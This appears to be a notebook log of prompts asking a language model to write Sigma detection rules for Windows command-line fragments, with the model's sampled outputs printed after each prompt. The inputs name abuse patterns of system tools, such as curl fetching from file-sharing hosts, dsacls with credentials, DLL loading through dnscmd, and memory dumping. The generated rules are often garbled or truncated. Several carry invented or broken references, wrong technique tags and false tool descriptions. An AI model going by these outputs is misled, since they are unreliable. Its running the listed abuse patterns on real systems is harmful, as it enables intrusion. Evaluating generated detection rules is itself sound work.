Write Sigma rule to detect payload:

### Input:
conhost /../../

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
conhost /../../

### Response:
Input: \Program Files \ConEmu \ConEmu64.exe [/]../../
id: f72a3102-6064-49d4-8951-3655225e0d48
status: test
description: Detects use of the conhost executable to bypass User Access Control (UAC) prompts.
references:
    - https://www.ehlotlabs.com/blog/abusing-conhost-exe-to-bypass-uac
author: Timur Zinniatullin, EHLabs (idea)
date: 2021-12-08
modified: 2022-01-27
tags:
    - attack.defense-evasion
    - attack.privilege-escalation
    - attack.t1053.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        _raw:
            - 'conhost.exe'
            - '\Program Files\ConEmu\ConEmu64.exe'
            - '\..\..\'
    condition: selection
falsepositives:
    - Uncommon use
level: medium







































































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\createdump.exe FX_VER_INTERNALNAME_STR -u --full -f --name .dmp

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\createdump.exe FX_VER_INTERNALNAME_STR -u --full -f --name .dmp

### Response:
Createdump.exe \createdump.exe FX_VER_INTERNALNAME_STR -u --full -f --name.dmp
id: d052b658-5822-4b3d-927b-827641b0519b
status: test
description: Detects the use of Createdump.exe
references:
    - https://twitter.com/SBousseaden/status/1475430809055050753
author: Florian Roth (Nextron Systems)
date: 2022-02-07
modified: 2023-11-04
tags:
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '\createdump.exe'
            - 'FX_VER_INTERNALNAME_STR'
        Image|endswith: '\createdump.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium


























































































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\csi.exe \\powershell.exe \\pwsh.exe \\powershell_ise.exe csi.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\csi.exe \powershell.exe \pwsh.exe \powershell_ise.exe csi.exe

### Response:
Input:
title: Renamed Command Prompt Execution Via CSI.EXE
id: 20291656-7392-4287-9e73-c6d25100130d
status: test
description: |
    Detects when a child process of a renamed cmd.exe spawns a powershell process. This is a technique used by various threat actors to evade detection based on process names and command lines.
references:
    - https://www.microsoft.com/security/blog/2022/02/16/a-new-approach-for-attacking-the-evolution-of-windows-defender-antivirus/
    - https://twitter. Tags: -T1218
    - t1218
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-03-22
modified: 2023-02-04
tags:
    - attack.execution
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_child:
        ParentImage|endswith: '\cmd.exe'
        Image|endswith: '\csi.exe'
    selection_parent:
        Image|e

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\csvde.exe csvde.exe -f -i

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\csvde.exe csvde.exe -f -i

### Response:
@operator: \csvde.exe \csvde.exe -f -i
id: 83872c12-16a3-4f9d-a0c4-699f8f8c9d3c
status: test
description: Detects use of csvde for local privilege escalation
references:
    - https://www.elastic.co/guide/en/security/current/local-privilege-escalation-via-csvde.html
author: Florian Roth (Nextron Systems)
date: 2020-02-26
modified: 2022-03-09
tags:
    - attack.privilege-escalation
    - attack.t1048.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\csvde.exe'
        - OriginalFileName: 'csvde.exe'
        - CommandLine|contains:
            - '-f'
            - '-i'
    condition: selection
falsepositives:
    - Legitimate use of csvde
level: medium





































































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\curl.exe curl.exe .githubusercontent.com anonfiles.com cdn.discordapp.com ddns.net dl.dropboxusercontent.com ghostbin.co glitch.me gofile.io hastebin.com mediafire.com mega.nz onrender.com pages.dev paste.ee pastebin.com pastebin.pl pastetext.net pixeldrain.com privatlab.com privatlab.net send.exploit.in sendspace.com storage.googleapis.com storjshare.io supabase.co temp.sh transfer.sh trycloudflare.com ufile.io w3spaces.com workers.dev http -O --remote-name --output

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\curl.exe curl.exe .githubusercontent.com anonfiles.com cdn.discordapp.com ddns.net dl.dropboxusercontent.com ghostbin.co glitch.me gofile.io hastebin.com mediafire.com mega.nz onrender.com pages.dev paste.ee pastebin.com pastebin.pl pastetext.net pixeldrain.com privatlab.com privatlab.net send.exploit.in sendspace.com storage.googleapis.com storjshare.io supabase.co temp.sh transfer.sh trycloudflare.com ufile.io w3spaces.com workers.dev http -O --remote-name --output

### Response:
For more information about the used command line flags, please check out the official documentation.

https://curl.se/docs/manpage.html

Input: curl.exe
title: Remote Execution via Curl
id: 08e69196-6497-45d0-b842-690187b66b75
status: test
description: Detects execution of Curl. Curl is commonly used by attackers to download and execute files.
references:
    - https://github. //blog/2032-exfiltrating-data-out-of-github-com
author: 'Oddvar Moe

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\curl.exe curl.exe --doh-insecure --proxy-insecure

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\curl.exe curl.exe --doh-insecure --proxy-insecure

### Response:
Input: \curl.exe curl.exe --doh-insecure --proxy-insecure
Response: PUA_Network_Protocols:Curl
id: 6e42a7ef-2876-43df-b936-923a8593f01a
status: test
description: |
    Detects use of the curl commandline tool with the "doh-insecure" and "proxy-insecure" flags.
    These flags are used by attackers to avoid using a legitimate proxy or server while using the popular curl utility.
references:
    - https://twitter.com/brandonstevens/status/1428159844977427458?s=12
    - https://blog.talosintelligence.com/2021/05/threats-to-cve-2021-28175.html
author: 'Brandon "h0ch5p3r" S.H. (Nextron Systems)', '@h0ch5p3r_', 'Talos Research'
date: 2021-05-14
modified: 2023-11-27
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        OriginalFileName: 'curl.exe'
        CommandLi

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\curl.exe curl.exe file:///

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\curl.exe curl.exe file:///

### Response:

Input:
file:///http:// -s -H

Response:
\curl.exe \curl.exe file:/// -s -H
id: 7163f9c5-7460-47c9-8f86-6510f2499bb7
status: test
description: Detects a suspicious CURL invocation that might indicate a remote data exfiltration (e.g. exfiltration to S3/Dropbox/etc)
references:
    - https://github.com/0x4rt3ga/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-09
tags:
    - attack.exfiltration
    - attack.t1021
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'curl.exe'
            - 'file:///'
        ParentCommandLine|contains:
            - 'curl.exe'
            - 'file:///'
    condition: selection
falsepositives:
    - Unknown
level: medium












































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\desktopimgdownldr.exe \\desktopimgdownldr.exe /lockscreenurl:http

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\desktopimgdownldr.exe \desktopimgdownldr.exe /lockscreenurl:http

### Response:
title: Remote Desktop Connection Shell Execution
id: 9a2047b1-351b-4779-9d7c-0c96692d970a
status: test
description: |
    Detects a potential use of "DesktopImgDownldr.exe" by Desktopimgdownldr.exe as part of the "Remote Desktop Connection" application.
    This could be abused by an adversary to remotely execute arbitrary code on the target system.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3440e66e005e855c/atomics/T1218.001/T1218.001.md#atomic-test-1---remote-desktop-connection-shell-execution
author: frack113
date: 2022-02-03
modified: 2023-11-18
tags:
    - attack.execution
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        - Image|endswith: '\Desktopimgdownldr.exe'
        - OriginalFileName: 'Desktopimgdownldr.exe'
        

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
/lockscreenurl: .jpg .jpeg .png reg delete \\PersonalizationCSP

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
/lockscreenurl: .jpg .jpeg .png reg delete \PersonalizationCSP

### Response:
Input: HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize theme"
title: Theme Change Via Registry
id: 92d25093-38e2-40b0-a5f7-c2e367bb716d
status: test
description: Detects theme change via registry. Can be abused to load a theme or other program.
references:
    - https://redcanary.com/blog/new-coin-trojan/
    - https://www.sophos.com/en-us/support/knowledgebase/2351869/threats-that-abuse-the-windows-personalization-csp
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-06
tags:
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '/lockscreenurl:'
            -'reg delete'
        Image|endswith:
            - '\PersonalizationCSP.dll'
    condition: selection
falsepositives:
    - Unlikely
level: medium

--

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\deviceenroller.exe deviceenroller.exe /PhoneDeepLink

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\deviceenroller.exe deviceenroller.exe /PhoneDeepLink

### Response:
Input: \deviceenroller.exe deviceenroller.exe /PhoneDeepLink
Registry: \HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AllowRemoteRPC
Registry: \HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
Registry: \HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections-UserSettings
Registry: \HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DeviceEnroller
Registry: \HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\DeviceEnroller
Registry: \HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup
Registry: \HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DeviceEnroller
Registry: \HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
title: Potential Remote Desktop Protocol (RDP) Connection
id: 015d233c-614a-4192-8c1f-a722429595b8
status: test
description: |
    Detects suspicio

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
-t msi-install -i http

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
-t msi-install -i http

### Response:
input:
    - title: Execute MSI file with http
      description: Detects execution of a MSI file using HTTP as source
      source: response
      id: 17447276-712b-473e-887b-3d5f926d95b1
      status: test
      tags:
        - attack.execution
        - attack.lateral-movement
        - attack.t1105
      description: Detects execution of a MSI file using HTTP as source, using "msiexec" from "msxml3"
      operator: or
      mockup:
        - title: 'Msiexec.exe'
          image: 'https://i.imgur. import(https://i.imgur.com/23J3U22.png)png'
          selection:
            filter_by:
              - keyword:
                keyword:'msiexec.exe'
            filter_children:
              - keyword:
                keyword: 'http'
                mode: match
              - keyword:
                keyword:'msic'
                mode: match
                negate: true
          chi

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
DirLister.exe \\dirlister.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
DirLister.exe \dirlister.exe

### Response:
Input: \dirlister.exe,dirlister.exe,
id: d24f9809-16e6-4248-b5a7-44348b369c48
status: test
description: Detects a specific DirLister.exe execution that could be used to identify the name of the files
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Dirlister/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-02
tags:
    - attack.execution
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\dirlister.exe'
        OriginalFileName: 'dirlister.exe'
    condition: selection
falsepositives:
    - Other applications starting the same process as DirLister
level: medium

```


### powershell
    
```
Get-ChildItem -Path C:\Windows\System32\dirlister.exe -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName
Get-Item "C:\Windows\System32\dirlister.e

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\diskshadow \\certutil \\cscript \\mshta \\powershell \\pwsh \\regsvr32 \\rundll32 \\wscript

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\diskshadow \certutil \cscript \mshta \powershell \pwsh \regsvr32 \rundll32 \wscript

### Response:
An adversary can abuse legitimate Microsoft utilities, such as certutil, powershell, and rundll32, to execute malicious commands. These utilities are commonly used by legitimate software such as an antivirus product, backup software, or system configuration software.

Adversaries may abuse legitimate Microsoft utilities to avoid detection when compromising a system. Common abuse cases include using PowerShell and Cscript to download and run a program from a remote location, using Rundll32 to launch a DLL, using Certutil to extract data from a certificate, and using Mshta to open a web page from the local intranet zone
(citation: Symantec Legion of the Assassin April 2019) (citation: Symantec Legion of the Assassin April 2019)

### Potential Queries:

Original query that led to discovery of this specific process as well as g

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
diskshadow.exe \\diskshadow.exe -s .txt

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
diskshadow.exe \diskshadow.exe -s .txt

### Response:
An attacker might use the diskshadow.exe tool to backup the shadow copy of the registry hive files.
Diskshadow.exe is a command-line utility for creating and managing shadow copies.
Adversaries can create a shadow copy of a specified file or volume to avoid the hassle of deleting temporary files after they have been copied to a system.
In this way, adversaries can create a shadow copy of a registry hive file before deleting or modifying it, which could lead to an inconsistent state and a partial hive file.
In this case, the adversary uses the diskshadow.exe utility to create a shadow copy of a specified file or volume to avoid the hassle of deleting temporary files after they have been copied to a system.


## Atomic Tests

- Atomic Test #1 - Create a Shadow Copy of a Registry Hive
ShadowCopy.vbs - Create a Shadow Copy of a Registry Hive
command: diskshadow.exe \disksh

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dism.exe DISM.EXE WindowsPowerShellWebAccess /online /enable-feature

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dism.exe DISM.EXE WindowsPowerShellWebAccess /online /enable-feature

### Response:
use: powerShell, enable-WindowsOptionalFeature, install-Module
author: frack113
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6054ac1425daa6744351f04bd6/atomics/T1548.002/T1548.002.md
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dism-online-servicing-command-line-options
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dism-online-image-management-command-line-options
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dism-enable-feature
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dism-image-management-command-line-options
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dism-image-management-command-line-opt

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\DismHost.exe /Online /Disable-Feature \\Dism.exe /Online /Disable-Feature

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\DismHost.exe /Online /Disable-Feature \Dism.exe /Online /Disable-Feature

### Response:
Input: \DismHost.exe /Online /Disable-Feature \Dism.exe /Online /Disable-Feature
id: d2a0e3f6-974d-4828-9f7c-c9e60043930b
status: test
description: Detects the disabling of Windows features via Dism.
references:
    - https://twitter.com/mr0ul3n/status/1204714470993883392
author: Nasreddine Bencherchali (Nextron Systems)
date: 2020-03-19
modified: 2021-11-27
tags:
    - attack.t1572
    - attack.t1574
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'DismHost.exe'
            - 'Disable-Feature'
    condition: selection
falsepositives:
    - Uncommon
level: medium





























































































































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dllhost.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dllhost.exe

### Response:
Input: \dllhost.exe [/un]regserver
unregserver:
title: Potentially Suspicious DLL Host Process Activity
id: 97b49c73-8235-4574-8b8d-4d0b3007a451
related:
    - id: 2016-01-04-unregister-dll-activity
      type: derived
status: test
description: Detects potentially suspicious DLL host activity that could indicate an unregistered DLL being loaded.
references:
    - https://twitter.com/sbousseaden/status/1457664685908800001
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-02-04
modified: 2023-12-04
tags:
    - attack.defense-evasion
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\dllhost.exe'
        CommandLine|contains:
            - '/un'
            -'regserver'
    condition: selection
falsepositives:
    - Unknown
level: medium

```





### powershell
```
Get-WinEvent | where {($_.Message -

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dnscmd.exe /enumrecords /enumzones /ZonePrint /info

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dnscmd.exe /enumrecords /enumzones /ZonePrint /info

### Response:
Input: \dnscmd.exe dnscmd.exe \\\\ -enumrecords -enumzones -ZonePrint -info
id: 9d942c1b-678c-4863-925b-66c6135654d8
related:
    - id: 4791142
      type: obsolete
status: test
description: Detects DnsCMD enumeration of zones or records
references:
    - https://twitter.com/bohops/status/1547728201979823623
author: BoHops (Nextron Systems)
date: 2022-02-16
modified: 2023-02-14
tags:
    - attack.discovery
    - attack.t1018
    - attack.t1016
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - '/enumrecords'
            - '/enumzones'
            - '/ZonePrint'
            - '/info'
    condition: selection
falsepositives:
    - False positives depend on the used tool.
level: medium

---

### Data Model

---

Input: \dnscmd.exe \\\\ -enumrecords -enumzones -ZonePrint -in

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dnscmd.exe /config /serverlevelplugindll

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dnscmd.exe /config /serverlevelplugindll

### Response:
DN_0032_DNSCmd_Config_ServerLevelPluginDll
id: 325c9d77-8277-4a3c-82c8-5534352b99dd
status: test
description: Detects a use of dnscmd.exe in order to load a server-level plugin dll (malware)
references:
    - https://twitter.com/bohops/status/1532748761350899457?s=21
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dnscmd/
author: BeyuDen (next generation threat hunter)
date: 2022-05-27
modified: 2023-02-18
tags:
    - attack.execution
    - attack.t1047
logsource:
    category: process_creation
    product: windows
detection:
    selection_image:
        - Image|endswith: '\dnscmd.exe'
        - OriginalFileName: 'dnscmd.exe'
    selection_commandline:
        CommandLine|contains:
            - '/config'
            - '/serverlevelplugindll'
    condition: all of selection_image, selection_commandline
falsepositives:
    - Unknown
level: medium



---

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\iodine.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\iodine.exe

### Response:
Upon execution, this tool will download and run a binary from a URL

### Notes:
This rule is written to detect use of IODINE in order to download and execute arbitrary files.
IODINE is a binary file extractor and downloader. The IODINE tool downloads and executes any binary file from any URL.

### Credit:
IODINE - https://github.com/HfireF0X/IODINE

### How it is used by criminals:
IODINE has been used by hackers to download and execute arbitrary binaries.

### References:
https://github.com/HfireF0X/IODINE
https://www.reddit.com/r/Windows10/comments/9j91j0/a_little_known_utility_to_download_execute/
https://www.hackingarticles.in/iodine-a-little-known-utility-to-download-execute-binary-files/

### Detection:
Selection | Content
---------|--------------
Image | \iodine.exe


### Mitigations:
None

### Recovery:
In the event that IODINE is utilized by a threat actor to download and execute arbitr

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dns.exe \\conhost.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dns.exe \conhost.exe

### Response:
Input: dns.exe conhost.exe
id: 6778d7f2-9f1c-4697-a817-86340e115e6e
related:
    - id: 88d860f1-f03e-4c9f-80c4-076d18224481
      type: similar
status: test
description: Detects execution of DNS and conhost
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3bf45c6e66a16051/atomics/T1108/T1108.md
    - https://eqllib.readthedocs.io/en/latest/analytics/00632813-dns-and-conhost-execution-as-uncommon-parent-process.html
author: frack113
date: 2022-12-11
modified: 2023-02-11
tags:
    - attack.execution
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'dns.exe'
            - 'conhost.exe'
    condition: selection
falsepositives:
    - Unlikely
level: medium



```





### powershell
    
```powershell
Get-WinEvent | where {($_.Message -

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dnx.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dnx.exe

### Response:
Input: \dnx.exe
title: Suspicious Dnx Execution
id: 845d2c59-e6b9-4659-90dd-845e74c6c6a9
status: test
description: Detects execution of the.NET Development Kit (DNX)
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd348bf0967c6a30f6/atomics/T1218/T1218.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-03-07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|contains: '\dnx.exe'
    selection_commandline:
        CommandLine|contains:
            - 'dnu'
            - 'dnx'
            - 'dnx-mono'
    condition: selection_img and selection_commandline
falsepositives:
    - Legitimate use of DNX
level: medium

```





### powershell
```
Get-WinEvent -LogName Application -FilterXPath 'Image" and CommandLine"' -MaxEvents 100 | where {($_.Message -match 'dnx.e

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dotnet-dump.exe dotnet-dump.dll collect

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dotnet-dump.exe dotnet-dump.dll collect

### Response:
Input: \dotnet-dump.exe dotnet-dump.dll collect
id: 0120d625-716c-4e37-973b-218781273e10
status: test
description: Detects usage of dotnet-dump to collect heap data
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DotnetDump/
    - https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-14
modified: 2023-08-14
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_net:
        CommandLine|contains|:
            - 'dotnet-dump.exe'
            - 'dotnet-dump.dll'
            - 'collect'
    selection_image:
        OriginalFileName|endswith|:
            - 'dotnet-dump.exe'
            - 'dotnet-dump.dll'
    selection:
        - AnyOf:
            - AllOf:
                Conditions:
                    -

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dotnet.exe .NET Host

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dotnet.exe .NET Host

### Response:
Input: \dotnet.exe.NET Host --.NET Host.dll
title: Potential DLL Execution Via Dotnet
id: ef59927a-77f4-47f3-b8b1-d1c170e24f2d
status: test
description: |
    Detects potential DLL execution by the.NET host via "dotnet.exe".
    This is commonly used by.NET assemblies that are not signed with a strong name.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Dotnet/
    - https://app.any.run/tasks/f8965c28-9128-4e2d-a808-7544f291c255/
    - https://www.huntressentials.com/blog/net-host-and-dll-execution-in-windows-terminal
author: Timur Zinnoeu
date: 2022-03-30
modified: 2022-10-09
tags:
    - attack.defense-evasion
    - attack.execution
    - attack.privilege-escalation
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        OriginalFileName: 'dotnet.exe'
        CommandLine|contains:
            - '--'
      

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dsacls.exe DSACLS.EXE /G GR GE GW GA WP WD

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dsacls.exe DSACLS.EXE /G GR GE GW GA WP WD

### Response:
Input command:

\dsacls.exe DSACLS.EXE /G GR GE GW GA WP WD

Output:


DSACLS.EXE - Generate and modify security descriptors for files and directories

dsacls [/G | /T] GR GE GW GA WP WD




title: DSACLS.EXE Execution
id: 5c1099b1-a36c-496f-a2d6-26d833c393e1
status: test
description: Detects the execution of DSACLS.EXE, a command-line tool for working with Active Directory security descriptors.
references:
    - https://www.cybereason.com/blog/detecting-active-directory-privilege-escalation-attacks
    - https://www /*.cybereason.com/blog/detecting-active-directory-privilege-escalation-attacks
    - https://isc.sans.edu/diary/21287
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-05-10
tags:
    - attack.defense-evasion
    - attack.privilege-escalation
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Im

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dsacls.exe DSACLS.EXE /user: /passwd:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dsacls.exe DSACLS.EXE /user: /passwd:

### Response:
References:
    - https://github.com/LOLBAS-Project/LOLBAS/issues/773
    - https://github.com/LOLBAS-Project/LOLBAS/issues/777
    - https://github.com/LOLBAS-Project/LOLBAS/issues/778
    - https://github.com/LOLBAS-Project/LOLBAS/issues/779
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dsacls
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd31b2bf395bf015bf/atomics/T1206/T1206.md
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd31b2bf395bf015bf/atomics/T1537/T1537.md
    - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720
    - https://www.linkedin.com/posts/sushant-mall-14967647_how-i-used-dsacls-exe-to-steal-password-activity-6380514467886109760-bYBV
author: frack113
date: 2022-02-09
modified: 2023-02-14
tags:
    - attack

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\dsquery.exe dsquery.exe trustedDomain

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\dsquery.exe dsquery.exe trustedDomain

### Response:
For each trusted domain, dsquery.exe will list out all the accounts in that domain
This is a very handy tool when you are looking for possible accounts in that domain

### Note:
Provided as a template for researchers and consultants who are interested in finding all accounts in a trusted domain



#### Test Dataset
